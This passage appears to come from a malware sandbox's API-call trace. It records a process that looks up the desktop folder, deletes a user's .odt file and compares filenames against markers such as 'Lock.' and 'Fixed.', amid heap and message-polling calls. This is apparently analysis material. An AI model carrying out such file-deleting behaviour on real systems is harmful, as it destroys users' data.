lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.581] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.581] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.581] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.581] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.581] FreeLibrary (hLibModule=0x76390000) returned 1 [0100.581] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.581] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.581] CloseHandle (hObject=0x458) returned 1 [0100.582] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.582] CloseHandle (hObject=0x44c) returned 1 [0100.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.585] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.586] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.586] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ERgdUGLd4HevVs5.odt", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt", lpFilePart=0x8cedf4*="ERgdUGLd4HevVs5.odt") returned 0x2b [0100.586] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\ergdugld4hevvs5.odt")) returned 0x20 [0100.586] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 0x9a3b80 [0100.586] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\ergdugld4hevvs5.odt")) returned 1 [0100.745] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 0 [0100.745] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0100.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75948 | out: hHeap=0x2af0000) returned 1 [0100.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0100.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.745] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0100.746] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0100.746] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0100.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75420 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f6c0 [0100.748] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ERgdUGLd4HevVs5.odt", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt", lpFilePart=0x8cf650*="ERgdUGLd4HevVs5.odt") returned 0x2b [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0100.748] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ERgdUGLd4HevVs5.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\ergdugld4hevvs5.odt")) returned 0xffffffff [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75420 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.748] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0100.748] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.748] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0100.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fqpL_g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qpL_g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL_g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L_g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="35J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0100.749] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0100.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77ad0 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fqpL_g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qpL_g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL_g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L_g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="35J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5J.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0100.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a60 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.751] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0100.751] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0100.752] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.752] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 